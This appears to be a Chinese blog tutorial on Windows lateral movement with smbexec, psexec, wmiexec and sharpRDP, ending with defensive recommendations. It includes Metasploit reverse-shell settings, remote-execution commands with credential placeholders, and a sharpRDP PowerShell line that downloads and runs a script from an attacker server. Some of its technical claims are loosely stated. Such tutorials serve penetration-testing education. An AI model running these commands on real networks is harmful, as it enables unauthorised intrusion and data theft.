内网横向移动:smbexec、psexec、wmiexec、sharpRDP 深度解析

于 2025-03-03 20:19:08 发布
阅读量1.1k 收藏 8
点赞数 17
分类专栏: 网络安全 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_57836225/article/details/145998357
版权

目录

内网横向移动:smbexec、psexec、wmiexec、sharpRDP 深度解析

一、内网横向移动概述

二、常用工具解析

(一)smbexec

(二)psexec

(三)wmiexec

(四)sharpRDP

三、实际应用场景与案例分析

四、总结与安全建议

在渗透测试和内网安全领域,内网横向移动是获取更高级权限、扩大攻击范围的关键环节。本文将围绕 smbexec、psexec、wmiexec、sharpRDP 这几种常用的内网横向移动工具展开,深入探讨它们的原理、使用方法,并结合实际代码示例进行全面解析。

一、内网横向移动概述

内网横向移动旨在利用已获取的权限,在内部网络中从一台主机移动到另一台主机,以获取更多资源和权限。这一过程通常基于已有的漏洞利用、账号密码获取等操作,借助各种工具和技术实现。其重要性在于突破初始入侵点的限制,进一步深入目标网络,挖掘敏感信息、控制更多主机,从而对整个内网安全构成严重威胁。

二、常用工具解析

(一)smbexec

smbexec 利用 SMB 协议漏洞在远程主机上执行命令。SMB 协议用于网络文件共享和服务通信,当目标主机存在相关漏洞且攻击者获取了有效的账号密码时,就可以通过 smbexec 向目标主机发送特制的请求,在远程主机上执行指定命令。

在 Metasploit(MSF)框架中,有集成的 smbexec 模块,使用方法如下:

use exploit/windows/smb/smbexec
set RHOSTS <目标主机IP>
set SMBUser <用户名>
set SMBPass <密码>
set PAYLOAD <有效载荷,如windows/meterpreter/reverse_tcp>
set LHOST <本地监听IP>
exploit

这段代码首先选择了 smbexec 模块,然后设置目标主机 IP、用户名、密码、有效载荷以及本地监听 IP,最后执行 exploit 命令发起攻击。成功后,攻击者可以获取目标主机的控制权。

(二)psexec

psexec 是一款强大的远程执行工具,它通过在远程主机上创建服务,将可执行文件复制到远程主机并执行,从而实现命令执行和交互会话获取。在 MSF 中也有集成的 psexec 模块,使用方式与 smbexec 类似:

use exploit/windows/smb/psexec
set RHOSTS <目标主机IP>
set SMBUser <用户名>
set SMBPass <密码>
set PAYLOAD <有效载荷,如windows/meterpreter/reverse_tcp>
set LHOST <本地监听IP>
exploit

此外,也可以通过命令行工具进行 psexec 操作,例如:

psexec \\目标主机IP -u <用户名> -p <密码> "命令"

这里通过指定目标主机 IP、用户名、密码以及要执行的命令来实现远程执行。

(三)wmiexec

wmiexec 利用 Windows Management Instrumentation(WMI)来执行命令。WMI 是 Windows 系统提供的管理工具,允许管理员远程管理和查询系统信息。wmiexec 通过向目标主机的 WMI 服务发送请求,在远程主机上执行命令并返回结果。

使用 Python 编写的 wmiexec 工具示例代码如下:

import wmi
c = wmi.WMI(computer="<目标主机IP>", user="<用户名>", password="<密码>")
process_id, return_value = c.Win32_Process.Create(CommandLine="命令")

这段代码使用wmi库连接到目标主机,然后调用Win32_Process.Create方法创建一个新进程来执行指定命令。

(四)sharpRDP

sharpRDP 是利用远程桌面协议(RDP)的控制台应用程序实现横向移动的工具。它能够对横向目标执行经过身份验证的命令控制。使用时需要提供目标主机名、执行的命令以及账号密码等信息。

sharpRDP 的使用示例:

sharpRDP.exe -computerName <目标主机名> -command "命令" -user <用户名> -password <密码>

如果想要使用更复杂的命令,如反弹 Shell,可以这样操作:

sharpRDP.exe -computerName <目标主机名> -command "powershell -c \"IEX (New-Object Net.WebClient).DownloadString('http://<本地服务器IP>/shell.ps1')\"" -user <用户名> -password <密码>

这里通过powershell命令从本地服务器下载并执行一个 PowerShell 脚本,实现反弹 Shell 的功能。

三、实际应用场景与案例分析

在实际内网渗透测试中,这些工具常常结合使用。例如,先通过信息收集获取目标网络中开放 SMB 服务且存在漏洞的主机,使用 smbexec 尝试获取初始权限。如果获取到普通用户权限,可以利用 psexec 或 wmiexec 进一步提升权限,获取系统权限。而 sharpRDP 则可以在获取账号密码后,通过 RDP 协议进行横向移动,执行命令或获取远程桌面会话。

假设在一个企业内网环境中,攻击者发现一台主机存在 SMB 漏洞,通过 smbexec 获取了普通用户权限。然后利用该用户权限,通过 psexec 执行命令,发现另一台主机上运行着敏感服务。此时,攻击者使用 sharpRDP,以获取的账号密码连接到该主机,执行命令窃取敏感数据,成功实现内网横向移动和数据窃取。

四、总结与安全建议

smbexec、psexec、wmiexec、sharpRDP 等工具在内网横向移动中发挥着重要作用,但同时也给内网安全带来了巨大挑战。为了防范这些攻击,企业和组织应采取以下安全措施:

  1. 及时更新系统和软件:定期更新操作系统、应用程序和网络设备的固件,修复已知漏洞,防止攻击者利用漏洞进行横向移动。
  2. 强化访问控制:实施严格的访问控制策略,限制用户和服务账号的权限,最小化特权使用,避免权限滥用。
  3. 监控与检测:部署入侵检测系统(IDS)、入侵防御系统(IPS)和安全信息和事件管理系统(SIEM),实时监控网络流量,及时发现异常的横向移动行为。
  4. 安全意识培训:对员工进行安全意识培训,提高员工对网络安全威胁的认识,避免因人为因素导致账号密码泄露。

内网横向移动技术与工具不断发展,安全防护也需要与时俱进。只有通过不断加强安全意识、完善安全策略和技术手段,才能有效保障内网安全。

内网渗透-【横向移动PsExec工具远程命令执行横向移动
lza20001103的博客
09-02 1781
横向移动PsExec工具远程命令执行横向移动 文章目录【横向移动PsExec工具远程命令执行横向移动PsExec介绍 PsExec介绍 psexec 是 windows 下非常好的一款远程命令行工具。 psexec的使用不需要对方主机开方3389端口, 只需要对方开启admin共享和ipc共享和ipc共享和ipc (该共享默认开启,依赖于445端口)。 但是,假如目标主机开启了防火墙(防火墙禁止445端口连接), psexec也是不能使用的,会提示找不到网络路径。 由于psexec是Windo
[横向移动] PsExec 工具远程 CMD 横向移动
最新发布
Blue17 の 小窝
03-20 756
而我们的 PsExec 主要是活跃在第三阶段,即拓展我们远程执行命令的手段(前两个阶段 PsExec 也可以,可以搜索一下 CMD 下载远程文件)。将恶意程序上传至靶机后,我们就可以通过 PsExec 直接远程在靶机上运行该恶意程序让靶机上线了,在前面我们也讲过了,当肉鸡与靶机建立信任关系后,PsExec 的执行就可以不用携带。由于 PsExec 是微软自己提供的工具,所以杀毒软件默认会将其列在白名单中(不过近期已经被列入黑名单了)。如上,成功以建立信任关系的用户权限执行恶意程序上线了靶机。
内网横向移动之:PSExec 与 WMI
f_carey的博客
11-14 1599
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 PSExec PSExec 原理: 通过管道在远程目标主机上创建一个 PSExec 服务,并在本地磁盘中生成一个名为 PSEXESVC 的二进制文件,然后通过 PSExec 服务运行命令,结束后删除服务。 1 Windows 下 PSExec 使用 PSExec 下载地址 利用注意点: 需要远程系统开启.
网络安全】企业内网中的横向移动
HBohan的博客
08-25 1652
横向移动,是攻击者侵入企业系统时,获取相关权限及重要数据的常见攻击手法。了解横向移动的原理有助于个人和企业更好地维护网络安全。 中安网星特此推出了横向移动科普系列,本系列共有三篇文章,我们会以简单轻松的话语为大家讲解横向移动的内容。 近年来,随着网络攻击、勒索事件频发,企业安全防护需求迅速上升,传统安全防护中以密码和权限管理为核心的单一防护模式愈发不能满足目前的网络安全环境。因而,深入了解攻击思路,“对症下药”,是目前网络安全行业发展的重要方向。 本篇文章将就“横向移动”这一典型攻击行为进行简单阐述,从攻击
内网安全之横向移动(冰蝎&&msf&&IPC$)
hack0919的博客
04-21 1009
冰蝎相较其它Webshell管理工具,具备如下优点:支持跨平台运行、多采用加密传输、版本更新频繁等。
简单的内网横向移动
m0_74326506的博客
07-23 1519
内网中,通过网站漏洞打进一台机器,进行存货扫描,扫到不同网段的机器,然后经过代理打进不同网段的机器,这种叫纵向移动,如果扫到同网段的机器,而且这台机器除了正常端口开放外,没有安装其他任何服务,这可以经过横向移动,打进这台同网段的机器。sc命令可以用来注册删除查询系统服务,如果创建一个服务与木马绑定,则可以实现上线,但是一会就掉线,因为要和服务管理器进行通信,若是异常,明显这个创建的服务并不是正常的服务,所以服务管理器则会终止服务。创建成功,成功上线,删掉计划任务后,msf依旧不会掉线。
内网横向移动——域渗透
Captain_RB的博客
09-08 3195
本文结合实践经验,详细介绍内网域渗透的基本思路和通用方法。
内网中的简单横向移动
Amire0x的小乐园
11-30 1734
横向移动 WMI 简介 全程Windows管理规范,从03开始一直存在 由一系列工具组成,可以在本地或者远程管理计算机系统 Windows默认不会讲WMI的操作记录在日志中 利用 条件 WMI服务开启,135端口,默认开启 防火墙允许135,445等端口通信 测试方法 nmap -p 135 ip telnet ip 135 ...... 管理员权限,及本地管理员组 wmic 用powershell联动cs wmic /node:<目标 ip> /user:<用户或域
【渗透测试笔记】之【内网渗透——横向移动PsExec的使用
2401_85599090的博客
06-25 447
【代码】【渗透测试笔记】之【内网渗透——横向移动PsExec的使用。
内网渗透-横向移动外部工具的使用
lza20001103的博客
10-01 2379
横向移动外部工具的使用 前言 文章目录横向移动外部工具的使用前言psexecSmbexecWmiexecmsf模块cs模块 psexec 首先已经获得了一个主机的会话,通过横向移动获得另一个主机的会话 在已获得的shell中输入 net use \192.168.52.141 /user:administrator “密码” (1)psexec https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec psexec使用 建立IPC连接,无需
内网横向移动—IPC&AT&schtasks
剁椒鱼头没剁椒的博客
06-24 1347
IPC( Internet Process Connection)共享“命名管道”的资源,是为了实现进程间通信而开放的命名管道。IPC可以通过验证用户名和密码获得相应的权限,通常在远程管理计算机和查看计算机的共享资源时使用。通过ipc$,可以与目标机器建立连接。利用这个连接,不仅可以访问目标机器中的文件,进行上传、下载等 操作,还可以在目标机器上运行其他命令,以获取目标机器的目录结构、用户列表等信息。
内网渗透----横向移动
浅笑996的博客
05-31 1222
SMB WMI 使用wmic查询远程主机进程信息: wmic /node:192.168.91.131 /user:Administrator /password:ABCabc123 process list brief 创建进程: wmic /node:192.168.91.131 /user:Administrator /password:ABCabc123 process cal...
内网渗透-内置工具横向移动
lza20001103的博客
10-01 1341
内置工具横向移动 文章目录内置工具横向移动前言IPCSchtasksIPC+ATIPC+SC后记 前言 前期给大家讲了一些横向移动的知识,今天给大家讲解一下横向移动中工具的使用。 IPC IPC+Schtasks(文件共享服务和定时任务) 利用条件: 开放了139,445端口 必须开启IPC$文件共享服务 需要目标机器的管理员账号和密码 hashdump load mimikatz 得到账号和密码 kerberos ssp wdigest net view 当前的域有哪些主机 net use 查看当前是否有
【安全科普】企业内网中的横向移动(一)
ZAWX_NETSTARSEC的博客
08-13 601
横向移动,是GJ者侵入企业系统时,获取相关权限及重要数据的常见GJ手法。了解横向移动的原理有助于个人和企业更好地维护网络安全。 中安网星特此推出了横向移动科普系列,本系列共有三篇文章,我们会以简单轻松的话语为大家讲解横向移动的内容。 近年来,随着网络GJ、勒索事件频发,企业安全防护需求迅速上升,传统安全防护中以密码和权限管...
内网安全-横向移动】WMI-WMIC命令&相关内网工具
02-08 9324
横向移动-WMI-WMIC命令】wmic、impacket-wmiexec、wmicmd.exe、WMIHACKER
【安全科普】企业内网中的横向移动
小王的储物间
12-21 386
实际上,在横向移动攻击过程中,攻击者不仅可以运用相关技术与思路访问共享文件夹、凭证等敏感信息,也可以通过“横向移动”的方法渗透其它主机,窃取商业数据、财务信息等。除此以外,还能以域控主机为跳板,横向移动到其它域内主机,通过已获取的密码直接登录目标主机,执行远程命令,完成域内控制,进而以关键信息与权限为由,实施勒索行为。此时,黑客会在已控制的普通主机上查找与目标主机和环境相关的信息,获知目标主机开放的端口、存在的漏洞等,然后利用该漏洞渗透目标主机获取凭证,再使用哈希传递、黄金白银票据等方式进行登录。
内网渗透(三十二)之横向移动篇-利用远控工具GoToHTTP横向移动
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-15 625
GotoHTTP工作在B2C模式。使用远程控制时,您不必在每一台电脑上都安装远程软件。不管身处何处,有浏览器就能访问远程电脑。即使公司网络管控,仍然可以控制或被控制。支持文件传输、无人值守、剪切板同步、远程语音、远程摄像头、多显示器支持GoToHTTP下载。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值